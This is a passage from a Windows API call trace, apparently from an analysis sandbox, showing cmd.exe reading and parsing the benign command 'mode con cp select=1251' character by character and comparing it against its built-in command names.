(HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x281ab0 [0032.180] GetConsoleTitleW (in: lpConsoleTitle=0x18f860, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.180] wcsstr (_Str="C:\\Windows\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0032.181] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0032.181] GetProcessHeap () returned 0x280000 [0032.181] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x281ab0 | out: hHeap=0x280000) returned 1 [0032.181] LocalFree (hMem=0x2997e0) returned 0x0 [0032.181] GetProcessHeap () returned 0x280000 [0032.181] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29aa10 | out: hHeap=0x280000) returned 1 [0032.182] _vsnwprintf (in: _Buffer=0x4a226340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f548 | out: _Buffer="\r\n") returned 2 [0032.182] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.182] GetFileType (hFile=0xf4) returned 0x3 [0032.182] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.182] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a21c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0032.182] WriteFile (in: hFile=0xf4, lpBuffer=0x4a21c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18f518, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesWritten=0x18f518*=0x2, lpOverlapped=0x0) returned 1 [0032.182] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a20f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0032.182] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a21c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.182] _vsnwprintf (in: _Buffer=0x4a20eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x18f558 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0032.182] _vsnwprintf (in: _Buffer=0x4a20ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x18f558 | out: _Buffer=">") returned 1 [0032.182] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.182] GetFileType (hFile=0xf4) returned 0x3 [0032.182] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.182] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a21c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0032.182] WriteFile (in: hFile=0xf4, lpBuffer=0x4a21c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x18f548, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesWritten=0x18f548*=0x26, lpOverlapped=0x0) returned 1 [0032.182] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.182] GetFileType (hFile=0xe8) returned 0x3 [0032.182] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.182] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.182] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.182] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e320, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0032.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.183] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e322, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0032.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.183] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e324, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0032.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.183] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e326, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0032.183] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.183] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.183] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.183] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e328, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0032.184] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.184] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.184] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.184] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e32a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0032.184] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.184] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.184] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.184] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e32c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0032.184] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.184] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.184] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.184] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0032.184] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.184] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.184] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.184] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0032.184] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.184] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.184] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.184] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e332, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0032.184] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.184] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.184] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.184] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e334, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0032.184] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.184] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.184] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.184] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e336, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0032.185] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.185] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.185] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.185] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e338, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0032.185] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.185] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.185] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.185] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e33a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0032.185] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.185] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.185] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.185] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e33c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0032.185] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.185] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.185] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.185] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e33e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0032.185] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.185] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.185] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.185] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e340, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0032.185] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.185] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.185] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.185] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e342, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0032.185] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.185] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.185] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.185] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e344, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0032.186] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.186] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.186] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.186] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e346, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0032.186] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.186] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.186] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.186] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e348, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0032.186] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.186] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.186] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.186] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e34a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0032.186] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.186] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.186] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.186] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e34c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0032.186] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.186] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.186] ReadFile (in: hFile=0xe8, lpBuffer=0x4a21c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x18f848, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesRead=0x18f848*=0x1, lpOverlapped=0x0) returned 1 [0032.186] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a21c320, cbMultiByte=1, lpWideCharStr=0x4a21e34e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0032.187] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.187] GetFileType (hFile=0xe8) returned 0x3 [0032.187] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.187] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.187] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.187] GetFileType (hFile=0xf4) returned 0x3 [0032.187] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.187] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x4a21c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0032.187] WriteFile (in: hFile=0xf4, lpBuffer=0x4a21c320*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x18f828, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesWritten=0x18f828*=0x18, lpOverlapped=0x0) returned 1 [0032.187] GetProcessHeap () returned 0x280000 [0032.187] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4012) returned 0x29cd20 [0032.187] GetProcessHeap () returned 0x280000 [0032.187] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29cd20 | out: hHeap=0x280000) returned 1 [0032.187] _wcsicmp (_String1="mode", _String2=")") returned 68 [0032.187] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0032.187] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0032.187] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0032.187] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0032.187] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0032.187] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0032.187] GetProcessHeap () returned 0x280000 [0032.188] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0) returned 0x2997e0 [0032.188] GetProcessHeap () returned 0x280000 [0032.188] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1a) returned 0x294610 [0032.188] GetProcessHeap () returned 0x280000 [0032.188] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x38) returned 0x296510 [0032.189] GetConsoleOutputCP () returned 0x1b5 [0032.189] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a21bfe0 | out: lpCPInfo=0x4a21bfe0) returned 1 [0032.189] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0032.189] GetConsoleTitleW (in: lpConsoleTitle=0x18f7e0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.189] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0032.189] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0032.189] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0032.189] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0032.189] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0032.189] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0032.189] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0032.189] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0032.189] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0032.189] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0032.190] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0032.190] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0032.190] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0032.190] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0032.190] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0032.190] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0032.190] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0032.190] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0032.190] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0032.190] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0032.190] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0032.190] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0032.190] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0032.190] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0032.190] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0032.190] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0032.190] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0032.190] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0032.190] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0032.190] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0032.190] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0032.190] _wcsicmp (_String1="mode", _String2="START") returned -6 [0032.190] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0032.190] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0032.191] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0032.191] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0032.191] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0032.191] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0032.191] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0032.191] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0032.191] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0032.191] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0032.191] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0032.191] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0032.191] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0032.191] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0032.191] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0032.191] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0032.191] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0032.191] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0032.191] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0032.191] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0032.191] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0032.191] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0032.191] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0032.191] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0032.191] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0032.191] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0032.191] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0032.191] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0032.191] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0032.191] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0032.191] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0032.191] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0032.191] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0032.191] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0032.191] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0032.191] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0032.191] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0032.191] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0032.191] _wcsicmp 